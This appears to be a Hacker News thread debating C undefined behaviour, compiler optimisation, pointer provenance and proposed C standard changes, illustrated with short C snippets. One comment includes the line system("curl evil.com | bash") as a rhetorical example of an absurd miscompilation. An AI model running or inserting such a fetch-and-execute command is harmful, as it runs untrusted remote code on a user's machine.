saagarjha · on April 15, 2020

32 bits is plenty to effectively break ASLR or significantly weaken a cryptographic key.

needs · on April 15, 2020

I would be more concerned by the fact that if i is 10, then you already are in trouble ;)

msebor · on April 14, 2020

This is a good example. Let me flesh it out a bit more to illustrate a specific instance of this problem:

  int a[2][2];
  int f (int i, int j)
   {
       int t = a[1][j];
       a[0][i] = 0;          // cannot change a[1]
       return a[1][j] - t;   // can be folded to zero
   }

The language says that elements of the matrix a must only be accessed by indices that are valid for each bound, so compilers can and some do optimize code based on that requirement (see https://godbolt.org/z/spSF8e).

But when a program breaks that requirement (say, by calling f(2, 0)) the function will likely return an unexpected value.

Spivak · on April 14, 2020

But I don't know what you want to happen in this case? If you actually call f(2,0) then the program makes no sense. How can you have an expected value for a function call that violates its preconditions?

userbinator · on April 14, 2020

Based on the memory layout of arrays, which AFAIK is defined rather strictly by the standard, a[0][2] will be the same as a[1][0].

a1369209993 · on April 15, 2020

> ["]I can use that information!"

Yes, that is a perfect example of buggy compiler handling of undefined behaviour. A non-buggy compiler would either behave in a manner chacteristic of the environment (ie read address array+i), ignore the situation entirely (which also results in reading array+i), or (preferably) issue a error to the effect of "possible array access out of bounds, suggest 'assert(i<10);' here".

mpweiher · on April 15, 2020

Very well put (deliberately using the exact terminology used in the standard)!

Can we just make that binding again? After all, it used to be.

It should be obvious to compiler writers what the intention of the standard is, because it says so in the dang text, but since this was downgraded to a note and you are technically not in violation if you do something different, everyone now acts as if doing the exact opposite of what is written there is somehow OK.

The downgrade to note-status seemed to be predicted on the idea implementors can be trusted to do The Right Thing™ in these cases. It is now evidently clear that they cannot, so we have to force them.

flatfinger · on April 15, 2020

> It should be obvious to compiler writers what the intention of the standard is, because it says so in the dang text, but since this was downgraded to a note and you are technically not in violation if you do something different, everyone now acts as if doing the exact opposite of what is written there is somehow OK.

Note that a compiler could be incapable of processing any useful programs whatsoever, and yet still be a "conforming C implementation" if it is capable of processing a deliberately contrived and useless program that exercises the Standard's translation limits. The authors of the Standard even acknowledge that possibility in the Rationale.

The problem is that the authors of the Standard recognized that anyone seeking to sell compilers would treat Undefined Behavior as an invitation to behave in whatever fashion would best meet their customers' needs, but failed to consider that a moderately-decent freely distributable compiler could become popular as a result of being freely distributable without its maintainers having to respect its users.

mpweiher · on April 16, 2020

Yep, that is exactly my analysis of the situation: an actual compiler vendor would never (could never) pull any of these stunts, or they'd simply go out of business in a jiffy. Alas, we all got suckered into "free", and now the compiler writers no longer listen to their users, because they are not their customers.

Their customers are they PhD advisers and Google, Apple and maybe a few more "whales" as Stonebraker described them, lamenting a similar situation in databases. Their needs are almost completely different from the rest of us!

For Google, a 0.1% performance improvement in one of their key applications is worth quite a bit of extra pain for their own developers, and pretty much an infinite amount of pain for other developers.

https://www.youtube.com/watch?v=DJFKl_5JTnA

flatfinger · on April 16, 2020

BTW, what do you think of the suggested text I offered near the top of this thread, that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes? It's too late to go back in time and add that to C89 or C99, but a lot of insanity could have been avoided had such text been present.

Further, instead of characterizing as UB all situations where a useful optimization might affect the behavior of a program, it would be far much safer and more useful to allow particular optimizations in cases where their effects might be observable, but where all allowable resulting behaviors would meet application requirements.

As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate", I would say that if the exit of a loop is reachable, and no individual action within the loop would be observably sequenced with regard to some particular succeeding operation, a compiler may at its leisure reorder the succeeding operation ahead of the loop. Additionally, if code gets stuck in a loop with no side effects that will never terminate, an implementation may provide an option to raise a signal to indicate that.

If a function is supposed to return a value meeting some criterion, and it would find such a value in all cases where a program could execute usefully, but the program would do something much worse than useless if the function were to return a value not meeting the criteria, a program execution where the function loops forever may be useless, and may be inferior to one that gets abnormally terminated by the aforementioned signal, but may be infinitely preferable to one where the function, as a result of "optimization", returns a bogus value. Allowing a programmer to safely write a loop which might end up not terminating would make it possible to yield more efficient machine code than would be needed if the only way to prevent the function from returning a bogus value would be to include optimizer-proof code to guard against the endless-loop case.

a1369209993 · on April 17, 2020

> that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes?

This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

> As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate"

This is actually completely unneeded, even for optimisation. If a side effect can be hoisted out of a loop at all, it can be hoisted regardless of whether the loop terminates. If the code (called from) inside the loop can (legally) observe the side effect, then it can't be hoisted even if the loop does always terminate. If code outside the loop observes the side effect, then either the loop terminates (and whatever lets you hoist terminating-loop side effects applies) or the code outside the loop is never executed (and thus can't observe any side effects, correct or incorrect).

flatfinger · on April 17, 2020

> This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

I would have no qualm with the way clang and gcc process various constructs if they were to explicitly state that its maintainers make no effort to make their optimizer suitable for any tasks involving the receipt of untrustworthy input. Instead, however, they claim that their optimizers are suitable for general-purpose use, despite the fact that their behavior isn't reliably suitable for many common purposes.

> This is actually completely unneeded, even for optimisation.

Consider the following function:

    unsigned long long test(unsigned long long x, int mode)
    {
      do
        x = slow_function_no_side_effects();
      while(x > 1);
      if (mode)
        return 1;
      else
        return x;
    }

Suppose the function is passed a value of "x" which would get caught in a cycle that never hits zero or one, but "mode" is 1. If the code is processed by performing every individual step in order, the function would never return. The rule in C11 is designed to avoid requiring that generated code compute the value of x when its only possible effect on the program's execution would be to prevent the execution of code that doesn't depend on its value.

Suppose the most important requirement that function test() must meet is that it must never return 1 unless mode is 1, or the iteration on x would yield 1 before it yields zero; returning 1 in any other cases would cause the computer's speaker to start playing Barney's "I love you" song, and while looping endlessly would be irksome, it would be less bad than Barney's singing. If a compiler determines that slow_function_no_side_effects() will never return an even number, should it be entitled to generate code that will return 1 when mode is zero, without regard for whether the loop actually completes?

I would think it reasonable for a compiler to defer/skip the computation of x in cases where mode is 1, or for a compiler that can tell that "x" will never be an even number to generate code that, after ensuring that the loop will actually terminate, would unconditionally return 1. Requiring that the programmer write extra code to ensure that the function not return 1 in cases where mode is zero but the loop doesn't terminate would defeat the purpose of "optimization".

a1369209993 · on April 17, 2020

Do you mean `x = slow_function_no_side_effects( x );`? Because if slow_function_no_side_effects really doesn't have side effects, then your version is equivalent to:

  x = slow_function_no_side_effects(); /* only once */
  if(x > 1) for(;;) { /* infinite loop */ }
  return mode ? 1 : x;

That said, I suppose it might be reasonable to explicitly note that a optimiser is allowed to make a program or subroutine complete in less time than it otherwise would, even that reduces the execution time from infinite to finite. That doesn't imply inferring any new facts about the program - either loop termination or otherwise - though. On the other hand it might be better to not allow that; you could make a case that the optimisation you describe is a algorithmic change, and if the programmer wants better performance, they need to write:

  unsigned long long test(unsigned long long x, int mode)
    {
    if(mode) return 1; /* early exit */
    do x = slow_function_no_side_effects(x);
    while(x > 1);
    return x;
    }

, just the same as if they wanted their sorting algorithm to complete in linear time on already-sorted inputs.

flatfinger · on April 18, 2020

Yeah, I meant `slow_function_no_side_effects(x)`. My point is that there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

In a broader sense, I think the problem is that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior, and consequently any action that would make the effects of an optimization visible must be characterized as UB.

I think it would be far more useful to recognize that optimizations may, on an opt-in or opt-out basis, be allowed to do various things whose effects would be observable, and correct programs that would allow such optimizations must work correctly for any possible combination of effects. Consider the function:

    struct blob { uint16_t a[100]; } x,y,z;

    void test1(int *dat, int n)
    {
      struct blob temp;
      for (int i=0; i<n; i++)
        temp.a[i] = i;
      x=temp;
      y=temp;

    }
    void test2(void)
    {
      int indices[] = {1,0};
      test1(indices, 2);
      z=x;
    }

Should the behavior of test2() be defined despite the fact that `temp` is not fully written before it is copied to `x` and `y`? What if anything should be guaranteed about the values of `x.a[2..99]`, `y.a[2..99]`, and `z.a[2..99]`?

While I would allow programmer to include directives mandating more precise behavior or allowing less precise behavior, I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match. My rationale would be that a programmer who sees `x` and `y` assigned from `temp` would be able to see where `temp` was created, and would be able to see that some parts of it might not have been written. If the programmer cared about ensuring that the parts of `x` and `y` corresponding to the unwritten parts matched, there would be many ways of doing that. If the programmer fails to do any of those things, it's likely because the programmer doesn't care about those values.

The programmer of function `test2()`, however, would generally have no way of knowing whether any part of `x` might hold something that won't behave as some possibly-meaningless number. Further, there's no practical way that the author of `test2` could ensure anything about the parts of `x` corresponding to parts of `temp` that don't be written. Thus, a compiler should not make any assumptions about whether a programmer cares about whether `z.a[2..99]` match `x.a[2..99]`.

A compiler's decision to optimize out assignments to `x[2..99]` and `y[2..99]` may be observable, but if code would not, in fact, care about whether `x[2..99]` and `y[2..99]` match, the fact that the optimization may cause the arrays to hold different Unspecified values should not affect any other aspect of program execution.

a1369209993 · on April 19, 2020

> there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

Yes, definitely true. It's debatable whether it's okay for a compiler to rewrite code as in second example at https://news.ycombinator.com/item?id=22903396 , but it is not debatable that rewriting it as with anything equivalent to:

  if(x > 1 && x == slow_function_no_side_effects(x))
    { system("curl evil.com | bash"); }

is a compiler bug, undefined behaviour be damned.

> that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior

I don't know if this quite characterizes the actual reasoning, but it does seem like a good summary of the overall situation, with "we might do x0 or x1, so x is undefined behaviour" ==> "x is undefined, so we'll do x79, even though we know that's horrible and obviously wrong".

> I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match.

Actually, I'm not sure that makes sense; your code is equivalent to:

  struct blob { uint16_t a[100]; } x,y,z;
  
  void test2(void)
    {
    int indices[] = {1,0};
    ; {
      int* dat = indices;
      int n = 2;
      ; {
        struct blob temp;
        for(int i=0; i<n; i++) temp.a[i] = i;
        /* should that be dat[i] ? */
        x=temp;
        y=temp;
        }
      }
    z=x;
    }

I don't think it makes sense to treat x=temp differently from z=x. Maybe if you treat local variables (temp) differently from global variables (x,y,z) but that seems brittle. (What happens if x,y,z are moved inside test2? What if temp is moved out? Does accessing some or all of them through pointers change things?)

flatfinger · on April 19, 2020

The indent is getting rather crazy on this thread; I'll reply further up-thread so as to make the indent less crazy.

flatfinger · on April 19, 2020

Replying to the code [discussed deeper in this sub-thread]:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp;
          for(int i=0; i<n; i++) 
            temp.a[dat[i]] = i; // This is what I'd meant
          x=temp;
          y=temp;
        }
        z=x;
      }

The rewrite sequence I would envision would be:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp1 = x; // Allowed initial value
          struct blob temp2 = y; // Allowed initial value
          for(int i=0; i<n; i++)
          {
            temp1.a[dat[i]] = i;
            temp2.a[dat[i]] = i;
          }
          x=temp1;
          y=temp2;
        }
        z=x;
      }

Compilers may replace an automatic object whose address is not observable with two objects, provided that anything that is written to one will be written to the other before the latter is examined (if it ever is). Such a possibility is the reason why automatic objects which are written between "setjmp" and "longjmp" must be declared "volatile".

If one allows a compiler to split "temp" into two objects without having to pre-initialize the parts that hold Indeterminate Value, that may allow more efficient code generation than would be possible if either "temp" was regarded as holding Unspecified Value, or if copying a partially-initialized object as classified as "modern-style Undefined Behavior", making it necessary for programmers to manually initialize entire structures, including parts whose values would otherwise not observably affect program execution.

The optimization benefits of attaching loose semantics to objects of automatic duration whose address is not observable are generally greater than the marginal benefits of attaching those semantics to all objects. The risks, however, are relatively small since everything that could affect the objects would be confined to a single function (it an object's address is passed into another function, its address would be observable during the execution of that function).

BTW, automatic objects whose address isn't taken have behaved somewhat more loosely than static objects even in compilers that didn't optimized aggressively. Consider, for example:

    volatile unsigned char x,y;
    int test(int dummy, int mode)
    {
      register unsigned char result;
      if (mode & 1) result = x;
      if (mode & 2) result = y;
      return result;
    }

On many machines, if an attempt to read an uninitialized automatic object whose address isn't taken is allowed to behave weirdly, the most efficient possible code for this function would allocate an "int"-sized register for "result", even though it's only an 8-bit type, do a sign-extending load from `x` and/or `y` if needed, and return whatever happens to be in that register. That would not be a complicated optimization; in fact, it's a simple enough optimization that even a single-shot compiler might be able to do it. It would, however, have the weird effect of allowing the uninitialized "result" object of type "unsigned char" to hold a value outside the result 0..255.

Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

a1369209993 · on April 19, 2020

  >   temp.a[dat[i]] = i; // This is what I'd meant

I see.

  >   struct blob temp1 = x; // Allowed initial value

With, I presume, a eye toward further producing:

  x.a[dat[i]] = i;
  y.a[dat[i]] = i;

?

> Compilers may replace an automatic object whose address is not observable with two objects,

That makes sense.

> do a sign-extending load from `x` and/or `y`

I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

> Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

Of course not. Result (assuming mode&3 == 0) is undefined, and behaviour characteristic of the environment is that result (aka eg eax) can hold any (say) 32-bit value (whether that's 0..FFFF'FFFF or -8000'0000..7FFF'FFFF depends on what operations are applied, but `int` suggests the latter).

None of this involves that the compiler infering objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

flatfinger · on April 19, 2020

> With, I presume, a eye toward further producing: x.a[dat[i]] = i; y.a[dat[i]] = i;

Bingo.

> I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

Naturally.

> None of this involves that the compiler infering objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

Thus the need to use an abstraction model which allows optimizations to alter observable aspects of a program whose behavior is, generally, defined. I wouldn't describe such things as "behavior characteristic of the environment", though the environment would affect the ways in which the effects of optimizations might be likely to manifest themselves.

Note that programs intended for different tasks on different platforms will benefit from slightly--but critically--different abstraction models, and there needs to be a way for programs to specify when deviations from the "load/store machine model" which would normally be acceptable, aren't. For example, there should be a way of indicating that a program requires that automatic objects always behave as though initialized with Unspecified rather than Indeterminate Value.

A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

Consider, for example:

    typedef void proc(int);  // Ever seen this shorthand for prototypes?
    proc do_something1, do_something2, do_something3;

    void test2(int z)
    {
      if (z < 60000) do_something3(z);
    }

    int q;
    void test1(int x)
    {
      q = x*60000/60000;
      if (q < 60000) do_something1(q);
      int y = x*60000/60000;
      if (y < 60000) do_something2(y);
      test2(y);
    }

Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

There could be optimization value in allowing a compiler to treat automatic objects "symbolically", allowing the second assignment/test combination to become:

      if (x*60000/60000 < 60000) 
        do_something2(x*60000/60000);

even though the effect of the substituted expression might not be consistent. I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees against them for local automatic objects whose address is not taken. On the other hand, there would need to be an operator which, when given an operand with a non-determinisitic value, would choose in Unspecified fashion from among the possibilities; to minimize security risks that could be posed by such values, I would say that function arguments should by default behave as though passed through that operator.

The guiding principle I would use in deciding that the value substitution would be reasonable when applied to y but not q or z would be that a programmer would be able to see how y's value is assigned, and see that it could produce something whose behavior would be "unusual", but a programmer looking at test2() would have no reason to believe such a thing about z.

a1369209993 · on April 19, 2020

> I wouldn't describe such things as "behavior characteristic of the environment",

`result` being a 32-bit integer (register) of dubious signedness is behaviour characteristic of the environment, which the implementation is sometimes obliged to paper over (eg with `and eax FF`) in the interests of being able to write correct code.

> A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

> Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

Yes, clearly.

> I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees

In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long -Ono-unsafe exists and is the default.

flatfinger · on April 19, 2020

> Yes, clearly.

Unfortunately, the C Standard doesn't specify an abstraction model that is amenable to the optimization of usable programs.

> In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long -Ono-unsafe exists and is the default.

The only reason for contention between compiler writers and programmers is a desire to allow compilers to optimized based upon the assumption that a program won't do certain things. The solution to that contention would be to have a means of inviting optimizations in cases where they would be safe and useful, analogous to what `restrict` would be if the definition of "based upon" wasn't so heinously broken.

a1369209993 · on April 20, 2020

> to allow compilers to optimized based upon the assumption that a program won't do certain things.

Emphasis mine. This is always wrong. Correct (and thus legitimate-to-optize-based-on) knowledge of program behavior is derived by actually looking at what the program actually does, eg "p can never be NULL because if is was, a previous jz/bz/cmovz pc would have taken us somewhere else"[0]. Optimising "based on" undefined behaviour is only legitimate to the extent that it consists of choosing the most convenient option from the space of concrete realizations of particular undefined behaviour that are consistent with the environment (especially the hardware).

0: Note that I don't say "a previous if-else statement", because when we say "p can never be NULL", we're already in the process of looking for reasons to remove if-else statements.

flatfinger · on April 20, 2020

There are many cases where accommodating weird corner cases would be expensive, and would only be useful for some kinds of program. Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency. The problem is that there's no way for programs to specify which corner cases they do or don't need.

a1369209993 · on April 20, 2020

> Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency.

Yes, that's what undefined behaviour is for. Eg requiring that implementations handle integer overflow needlessly degrades efficiency of the overwhelming majority of tasks where integers do not if fact overflow.

> The problem is that there's no way for programs to specify which corner cases they do or don't need.

Wait, are you just asking (the situationally appropriate equivalent of) `(int32_t)((uint32_t)x+(uint32_t)y)` and/or `#pragma unsafe assert(p!=NULL)`? Because while it's a shame the standard doesn't provide standardized ways to specify these things (as I admitted upthread) programs are prefectly capable of using the former, and implementations are perfectly capable of supporting the latter; I'm just arguing that the defaults should be sensible.

flatfinger · on April 21, 2020

In many cases, the semantics programmers would require are much looser than anything provided for by the Standard. For example, if a programmer requires an expression that computes (x \* y / z) when there is no overflow, and computes an arbitrary value with no side effects when there is an overflow, a programmer could write the expression with unsigned and signed casting operators, but that would force a compiler generate machine code to actually perform the multiplication and division even in cases where it knows that y will always be twice z. Under "yield any value with no side effects" semantics, a compiler could replace the expression with (x \* 2), which would be much faster to compute.

msebor · on April 14, 2020

This is a common misconception (or poor way of phrasing it, sorry). Compiler implementers don't go looking for instances of undefined behavior in a program with the goal of optimizing it in some way. There is little value in optimizing invalid code. The opposite is the case.

But we must write code that relies on the same rules and requirements that programs are held to (and vice versa). When either party breaks those rules, either accidentally or deliberately, bad things happen.

What sometimes happens is that code written years or decades ago relies on the absence of an explicit guarantee in the language suddenly stops working because a compiler change depends on the assumption that code doesn't rely on the absence of the guarantee. That can happen as a result of improving optimizations, which is often but not not necessarily always motivated by improving the efficiency of programs. Better analysis can also help find bugs in code or avoid issuing warnings for safe code.

flatfinger · on April 15, 2020

The fact that the Standard does not impose requirements upon how a piece of code behaves implies that the code is not strictly conforming, but the notion that it is "invalid" runs directly contrary to the intentions of the C89 and C99 Standards Committees, as documented in the published C99 Rationale. That document recognizes Undefined Behavior as, among other things, "identifying avenues of conforming language extension". Code that relies upon such extensions may be non-portable, but the authors of the Standard have expressly said that they did not wish to demean useful programs that happen to be non-portable.

ori_b · on April 14, 2020

There are rules and requirements documented in the spec, and there are de-facto rules and requirements that programs expect. Not only that, but when they do exploit these rules, often the code generated is obviously incorrect, and could have been flagged at compile time.

Right now, it seems like compiler vendors are playing a game of chicken with their users.

saagarjha · on April 14, 2020

I think the issue is that many of these "obviously incorrect" things are not obvious at the level that the optimizations are taking place. Perhaps it would be worth considering adding higher-level passes in the compiler that can detect these kinds of surprising changes and warn about them.

a1369209993 · on April 15, 2020

Well, no, the issue is that the compiler writers refuse to acknowledge the these obviously incorrect things are incorrect in the first place and tend to blame users for tripping over compiler bugs. If it were just that they didn't know how to fix said bugs, that would be a qualitatively different and much less severe problem.

mpweiher · on April 15, 2020

> not obvious at the level that the optimizations are taking place

Hmm...then it's up to the optimisers to up their game.

Optimisation is supposed to be behaviour-preserving. Arguing that almost all real-world programs invoke UB and therefore don't have well-defined behaviour (by the standard as currently interpreted) is a bit of a cop-out.

cwzwarich · on April 14, 2020

> This is a common misconception (or poor way of phrasing it, sorry). Compiler implementers don't go looking for instances of undefined behavior in a program with the goal of optimizing it in some way. There is little value in optimizing invalid code. The opposite is the case.

Compilers do deliberately look to optimize loops with signed counters by exploiting UB to assume that they will never wrap.

qznc · on April 14, 2020

I'd say both statements are correct.

Compiler implementers are happy when they don't have to care about some edge case because then the code is simpler. Thus, only for unsigned counters there is the extra logic to compile them correctly.

That is my interpretation of "The opposite is the case". Writing a compiler is easier with lots of undefined behavior.

ender341341 · on April 15, 2020

But that's backwards, the compiler writers are writing special cases to erase checks in the signed case. Doing the 'dumb' thing and mindlessly going through the written check is simpler which is why that's what compilers did for decades as de facto standard on x86.

qznc · on April 15, 2020

The dump thing is a non optimizing compiler. GCC and LLVM contain many optimization phases. It is probably some normal optimization which is only "wrong" in the context of loop conditions.

Leherenn · on April 14, 2020

Well yes, they assume they never wrap because that is not allowed by the language, by definition. UB are the results of broken preconditions at the language level.

GoblinSlayer · on April 15, 2020

Terminology can go either way, but is it such a good idea what gcc actually does?

rseacord · on April 14, 2020

I would say that there is a lot of concern in the committee about how compilers are optimizing based on pointer providence. There has been a study group looking at this. It now appears that they are likely to publish their proposal as a Technical Report.

_kst_ · on April 14, 2020

"based on pointer providence"

I think you meant "provenance" (mentioning it for the sake of anyone who wants to search for it).

rseacord · on April 14, 2020

Yes, my mistake--I was thinking of Rhode Island. I wrote a short bit about this at https://www.nccgroup.trust/us/about-us/newsroom-and-events/b... if anyone is interested.

flatfinger · on April 15, 2020

What makes pointer provenance really great is that clang and gcc will treat that pointers that are observed to have the same address as freely interchangeable, even if their provenance is different. Clang sometimes even goes so far with that concept that even uintptr_t comparisons won't help.

    extern int x[],y[];
    int test(int i)
    {
        y[0] = 1;
        if ((uintptr_t)(x+5) == (uintptr_t)(y+i))
            y[i] = 2;
        return y[0];
    }

If this function is invoked with i==0, it should be possible for y[0] and the return value to both be 1, or both be 2. If x has five elements, however, and y immediately follows it, clang's generated code will set y[0] to 2 and yet return 1. Cool, eh?

revertts · on April 14, 2020

What's the best way to keep an eye out for that TR? Periodically checking http://www.open-std.org/jtc1/sc22/wg14/ ?

I can't ever tell if I'm looking in the right place. :)

AaronBallman · on April 14, 2020

If you're interested in the final TR, I would imagine we'd list it on that page you linked. If you're interested in following the drafts before it becomes published, you'd fine them on http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log... (A draft has yet to be posted, though, so you won't find one there yet.)

ximeng · on April 14, 2020

Why would a vendor be unhappy about that? They have a large library using this deprecated syntax? Or many customers? It seems like a relatively easy fix to existing code.

AaronBallman · on April 14, 2020

The usual argument is: once you've verified some piece of code is correct, changing it (even when there should be no functional change in the semantics) carries risk. Some customers have C89-era code that compiles in C17 mode and they don't want to change that code because of these risks (perhaps the cost of testing is prohibitively expensive, there may be contractual obligations that kick in when changing that code, etc).

rmind · on April 14, 2020

Well, one argument is that the vendors should not compile C89 code as C17. If you write C89, then stick with -std=c89 (or upgrade to the latest officially compatible revision).

It makes sense to preserve language compatibility within several language revisions, gradually sunsetting some features, but why do that for the eternity? Gradual de-supporting would push the problem to the compilers, but while it is no fun supporting, let's say, C89 and a hypothetical incompatible language C3X, this is where the effort should go (after all, companies with the old codebases can stick with older compilers). There is a great value in paving a way for a more fundamental C language simplifications and clean ups.

apotheon · on April 14, 2020

These are all good points, and I don't see a legitimate, technical reason to avoid deprecating and eliminating identifier list syntax in new C standards (but then, I'm not as much of an expert as some people, so I might be missing something important).

That having been said, a compiler vendor has, almost by definition as its first priority, an undeniable interest in keeping customers happy while, at the same time, ensuring strong reasons to see value in a version upgrade. When dealing with corporate enterprise customers, that often means offering new features without deprecating old features, because the customers want the new features but don't want to have to rewrite anything just because of a compiler upgrade.

They'll want C17 (and C32, for that matter) hot new features, but they will not want to pay a developer to "rewrite code that already works" (in the view of middle managers).

That's why I think they'd most likely complain. Their concerns about removing identifier lists likely have nothing at all to do with good technical sense. Ideally, if you don't want to rewrite your rickety old bit-rotting shit code, you should just continue compiling it with an old compiler, and if you want new language features you should use them in new language standard code, period, but business (for pathological, perhaps, but not really upstream-curable reasons) doesn't generally work that way.

ximeng · on April 14, 2020

One alternative at that point is to just ignore the fact that the deprecated feature is now removed and continue supporting it in your compiler. Maybe you hide standards compliance behind a flag. Annoying and more overhead, but saves your clients from spending dollars on upgrading their obsolete code.

apotheon · on April 16, 2020

Yep. That happens a lot, in practice.

bumblebritches5 · on April 14, 2020

Looks like that proposal is dropping support for K&R function declarations, is that right?

rseacord · on April 14, 2020

yes, that is correct.

cesarb · on April 14, 2020

> Proper array support (which passes around the length along with the data pointer).

I second this one. One of the best things from Rust is its "fat pointers", which combine a (pointer, length) or a (pointer, vtable) pair as a single unit. When you pass an array or string slice to a function, under the covers the Rust compiler passes a pair of arguments, but to the programmer they act as if they were a single thing (so there's no risk of mixing up lengths from different slices).

kazinator · on April 14, 2020

The C family has already evolved in this direction decades ago. Have you heard of C++ (Cee Plus Plus)?

It is production-ready; if you want a dialect of C with arrays that know their length, you can use C++. If you wanted a dialect of C in 1993 with arrays that know their length for use in a production app you could also have used C++ then.

The problem with all these "can we add X to C" is that there is always an implicit "... but please let us not add Y, Z and W, because that would start to turn C into C++, which we all agree that we definitely don't want or need."

The kicker is that everyone wants a different X.

Elsewhere in this thread, I noticed someone is asking for namespace { } and so it goes.

C++ is the result --- is that version of the C language --- where most of the crazy "can you add this to C" proposals have converged and materialized. "Yes" was said to a lot of proposals over the years. C++ users had to accept features they don't like that other people wanted, and had to learn them so they could understand C++ programs in the wild, not just their own programs.

apotheon · on April 14, 2020

C++ introduces a shit-ton of stuff that one often doesn't want, and even Bjarne Stroustrup (who many content has never seen a language feature he didn't want) has been a little alarmed at the sheer mass of cruft being crammed into recent updates to the standard. I know many C++ people think C++ is pure improvement over C in all contexts and manners, but it's not. It's different, and there are features implemented in C++ and not in C that could be added to C without damaging C's particular areas of greatest value, and many other features in C++ that would be pretty bad for some of C's most important use cases.

C shouldn't turn into C++, or even C++ Lite™, but it shouldn't remain strictly unchanging for all eternity, either. It should just always strive to be a better C, conservatively, because its niche is one where conservative advancement is important.

Some way to adopt programming practices that guaranteee consistent management of array and pointer length -- not just write code to check it, but actually guarantee it -- would, I think, perfectly fit the needs of conservative advancement suitable to C's most important niche(s). It may not take the form of a Rust-like "fat pointer". It may just be the ability to tell the compiler to enforce a particular constraint for relationships between specific struct fields/members (as someone else in this discussion suggested), in a backward-compatible manner such that the exact same code would compile in an older-standard compiler -- a very conservative approach that should, in fact, solve the problem as well as "fat pointers".

There are ways to get the actually important upgrades without recreating C++.

kazinator · on April 14, 2020

> C++ introduces a shit-ton of stuff that one often doesn't want

The point in my comment is that every single item in C++ was wanted and championed by someone, exactly like all the talk about adding this and that to C.

> C shouldn't turn into C++

Well, C did turn into C++. The entity that gave forth C++ is C.

Analogy: when we say "apes turned into humans", we don't mean that apes don't exist any more or are not continuing to evolve.

Since C++ is here, there is no need for C to turn into another C++ again.

A good way to have a C++ with fewer features would be to trim from C++ rather than add to C.

nicoburns · on April 14, 2020

Sure, but theres a vast space between the C and C++ approaches. You don't have to say yes to everything to say yes to a few things. I would suggest that better arrays are an example of something that pretty much everybody wants.

simias · on April 15, 2020

But if you want better arrays you want operator overload to be able to use these arrays as 1st class citizens without having to use array_get(arr, 3), array_len(arr), array_concatenate(arr1, arr2) etc... You want to be able to write "arr[3]", "arr.len()", "arr1 += arr2" etc... To implement operator overload you might need to add the concept of references.

If you want your arrays type-safe you'll need dark macro magic (actually possible in the latest standards I think) or proper templates/generics.

If you really want to make your arrays convenient to use you'll want destructors and RAII.

Then you'd like to be able to conveniently search, sort and filter those arrays. That's clunky without lambdas.

And once you get all that, why not move semantics and...

Conversely if you don't want any of this what's wrong with:

    struct my_array {
        my_type_t *buf;
        size_t len;
    }

